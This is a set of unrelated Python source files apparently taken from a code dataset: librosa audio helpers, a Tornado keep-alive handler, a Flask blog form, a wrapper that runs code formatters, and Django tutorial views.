            features[input_size + j] = 1.0
            target = torch.zeros(2 * input_size - 1)
            target[i + j] = 1.0
            pairs.append((features, target))
    return pairs
| StarcoderdataPython |
195493 | import librosa
import numpy as np
import os
from librosa.display import specshow
import matplotlib.pyplot as plt
import IPython.display as ipd
from alcokit import HOP_LENGTH, SR, N_FFT
import pickle
def save_pickle(obj, path):
    """Serialize *obj* to *path* with pickle; returns None."""
    with open(path, "wb") as fh:
        pickle.dump(obj, fh)
    return None
def load_pickle(path):
    """Deserialize and return the object stored at *path*.

    NOTE: pickle is unsafe on untrusted files; only load files you created.
    """
    with open(path, "rb") as fh:
        return pickle.load(fh)
# OS
def is_audio_file(file):
    """True for audio filenames (wav/aif/aiff/mp3/m4a/mp4), skipping "._" sidecar files.

    FIX: the extension check is now case-insensitive, so "X.WAV" is accepted
    (the original rejected upper-case extensions). The "._" filter excludes
    macOS AppleDouble resource-fork files.
    """
    return file.split(".")[-1].lower() in ("wav", "aif", "aiff", "mp3", "m4a", "mp4") and "._" not in file
def flat_dir(directory, ext_filter=is_audio_file):
    """Recursively collect file paths under *directory* accepted by *ext_filter*, sorted."""
    matches = []
    for root, _, filenames in os.walk(directory):
        matches.extend(os.path.join(root, name)
                       for name in filenames if ext_filter(name))
    return sorted(matches)
def fs_dict(root, extension_filter=is_audio_file):
    """Return (root_name, {directory: [matching files]}) for *root*.

    Directories with no matching files are dropped; raises ValueError when
    the walk finds nothing at all (e.g. nonexistent path).
    """
    root_name = os.path.split(root.strip("/"))[-1]
    items = [(d, [name for name in files if extension_filter(name)])
             for d, _, files in os.walk(root)]
    if not items:
        raise ValueError("no audio files found on path %s" % root)
    return root_name, {d: files for d, files in items if files}
# Conversion: short aliases for the librosa unit-conversion helpers.
normalize = librosa.util.normalize
# amplitude -> dB, referenced to the spectrum maximum
a2db = lambda S: librosa.amplitude_to_db(abs(S), ref=S.max())
s2f = librosa.samples_to_frames
s2t = librosa.samples_to_time
f2s = librosa.frames_to_samples
f2t = librosa.frames_to_time
t2f = librosa.time_to_frames
t2s = librosa.time_to_samples
hz2m = librosa.hz_to_midi
m2hz = librosa.midi_to_hz
def m2b(m, sr=SR, n_fft=N_FFT):
    """Convert a midi pitch to its (fractional) FFT bin index."""
    # width of one FFT bin in Hz
    step = (sr / 2) / (n_fft // 2)
    return m2hz(m) / step
def b2m(b, sr=SR, n_fft=N_FFT):
    """Convert an FFT bin index to its (fractional) midi pitch."""
    # width of one FFT bin in Hz
    step = (sr / 2) / (n_fft // 2)
    return hz2m(b * step)
def delta_b(b, delta_m=1, sr=SR, n_fft=N_FFT):
    """
    Return the size in bins of the interval ``delta_m`` (in midi) at bin ``b``.
    """
    params = dict(sr=sr, n_fft=n_fft)
    # bin distance to the pitch that lies delta_m semitones below bin b
    return b - m2b(b2m(b, **params) - delta_m, **params)
def unit_scale(x):
    """Linearly rescale *x* into [0, 1].

    FIX: a constant (or single-value) input previously produced NaNs via a
    0/0 division; it now returns an all-zero float array instead.
    """
    x = np.asarray(x)
    rng = x.max() - x.min()
    if rng == 0:
        return np.zeros_like(x, dtype=float)
    return (x - x.min()) / rng
# Debugging utils
def db(S):
    """Convert a spectrogram to dB, shifting non-negative magnitude spectra by +40 dB.

    Complex inputs use their magnitude; non-negative float inputs are treated
    as magnitude spectra; anything else (e.g. already-dB data) is converted
    as-is.
    """
    if np.iscomplexobj(S):
        # BUG FIX: ndarray has no ``.abs`` attribute — the original ``S.abs``
        # raised AttributeError; complex128 also fell through to a complex
        # comparison that raised TypeError.
        S_hat = a2db(np.abs(S)) + 40
    elif np.issubdtype(S.dtype, np.floating) and S.min() >= 0:
        # np.issubdtype replaces the (np.float, np.float_) tuple, which breaks
        # on modern numpy where those aliases were removed.
        S_hat = a2db(S) + 40
    else:
        S_hat = a2db(S)
    return S_hat
def signal(S, hop_length=HOP_LENGTH):
    """Invert a spectrogram to a time-domain signal.

    Complex input is inverted exactly with ISTFT; magnitude-only input is
    approximated with Griffin-Lim phase reconstruction (32 iterations).
    """
    if S.dtype in (np.complex64, np.complex128):
        return librosa.istft(S, hop_length=hop_length)
    else:
        return librosa.griffinlim(S, hop_length=hop_length, n_iter=32)
def audio(S, hop_length=HOP_LENGTH, sr=SR):
    """Display an IPython audio widget for a spectrogram (2-d) or signal (1-d)."""
    if len(S.shape) > 1:
        # 2-d input: invert the spectrogram first
        y = signal(S, hop_length)
        if y.size > 0:
            return ipd.display(ipd.Audio(y, rate=sr))
        else:
            # empty result: render a short silent clip instead of failing
            return ipd.display(ipd.Audio(np.zeros(hop_length*2), rate=sr))
    else:
        return ipd.display(ipd.Audio(S, rate=sr))
def playlist(iterable):
    """Render one audio player per segment in *iterable*."""
    for segment in iterable:
        audio(segment)
    return
def playthrough(iterable, axis=1):
    """Concatenate the segments along *axis* and render them as one audio player."""
    combined = np.concatenate(iterable, axis=axis)
    return audio(combined)
def show(S, figsize=(), to_db=True, y_axis="linear", x_axis='frames', title=""):
    """Plot a spectrogram with librosa's specshow and return the matplotlib axes.

    When *to_db* is true the input is first converted with ``db``; a new
    figure is opened only if *figsize* is given.
    """
    S_hat = db(S) if to_db else S
    if figsize:
        plt.figure(figsize=figsize)
    ax = specshow(S_hat, x_axis=x_axis, y_axis=y_axis, sr=SR)
    plt.colorbar()
    plt.tight_layout()
    plt.title(title)
    return ax
| StarcoderdataPython |
9649589 | import tornado.web
import tornado.gen
import json
import logging
from mickey.basehandler import BaseHandler
from mickey.groups import GroupMgrMgr
import mickey.redis
class OpenAttachKeepAliveHandler(BaseHandler):
    """POST handler that refreshes the keep-alive marker for a group attacher."""

    @tornado.web.asynchronous
    @tornado.gen.coroutine
    def post(self):
        data = json.loads(self.request.body.decode("utf-8"))
        groupid = data.get("id", "")
        device = data.get("device", "")
        if not groupid:
            # a group id is mandatory; reject the request
            logging.error("keep alive failed without groupid")
            self.set_status(403)
            self.finish()
            return
        if device:
            # refresh this device's keep-alive key with a 120s TTL
            kp_key = GroupMgrMgr.get_kpalive_key(device, self.p_userid, groupid)
            mickey.redis.write_to_redis(kp_key, "OK", expire = 120)
        # NOTE(review): indentation was lost in extraction — the call below is
        # assumed to run for every request, not only when `device` is set; confirm.
        GroupMgrMgr.keepalive_attacher(groupid, self.p_userid)
        self.set_status(200)
        self.finish()
| StarcoderdataPython |
319088 | <gh_stars>1-10
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from flask.ext.wtf import Form
from flask.ext.pagedown.fields import PageDownField
from wtforms import StringField, SubmitField
from wtforms.validators import Required
class PostForm(Form):
    """Blog-post creation form: title, Markdown body and tag (all required)."""
    head = StringField('What is your head',validators=[Required()])
    body = PageDownField('What is your post body', validators=[Required()])
    tag = StringField('What is post tag',validators=[Required()])
    submit = SubmitField('Submit')
1931146 | <reponame>Peking-Epoch/pyfmt
"""Main module."""
import os
def fmt(folder: str):
    """Run the formatting tool-chain (isort, autoflake, black, isort) on *folder*.

    FIX: commands are executed as argument lists via subprocess instead of
    being interpolated into a shell string with os.system, so a folder path
    containing spaces or shell metacharacters cannot alter the command
    (shell-injection risk).

    NOTE: unlike os.system, subprocess.run raises FileNotFoundError when a
    tool binary is missing from PATH.
    """
    import subprocess  # local import keeps the module's import surface unchanged

    commands = [
        ["isort", "--recursive", "--force-single-line-imports", "--apply", folder],
        ["autoflake", "--remove-all-unused-imports", "--recursive",
         "--remove-unused-variables", "--in-place", folder, "--exclude=__init__.py"],
        ["black", folder],
        ["isort", "--recursive", "--apply", folder],
    ]
    for cmd in commands:
        # check=False mirrors os.system's ignore-the-exit-code behaviour
        subprocess.run(cmd, check=False)
| StarcoderdataPython |
3230179 | <gh_stars>0
from django.shortcuts import render
from django.http import HttpResponse
from rango.models import Category
def index(request):
    """Render the Rango home page with the five most-liked categories."""
    category_list = Category.objects.order_by('-likes')[:5]

    context_dict = {}
    context_dict['boldmessage'] = 'Crunchy, creamy, cookie, candy, cupcake!'
    context_dict['categories'] = category_list

    # Render the response and send it back!
    return render(request, 'rango/index.html', context=context_dict)
def about(request):
    """Render the Rango about page with a fixed attribution message."""
    return render(
        request,
        'rango/about.html',
        context={'boldmessage': 'This tutorial has been put together by <NAME>'},
    )
def show_category(request, category_name_slug):
    """Render one category page with its associated pages.

    Unknown slugs render the template with ``category``/``pages`` set to
    None rather than raising a 404.
    """
    # BUG FIX: ``Page`` was referenced but never imported (the module only
    # imports Category from rango.models), so every request raised NameError.
    from rango.models import Page

    context_dict = {}
    try:
        category = Category.objects.get(slug=category_name_slug)
        pages = Page.objects.filter(category=category)
        context_dict['pages'] = pages
        context_dict['category'] = category
    except Category.DoesNotExist:
        # unknown slug: let the template show a "no such category" message
        context_dict['pages'] = None
        context_dict['category'] = None
    return render(request, 'rango/category.html', context=context_dict)
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.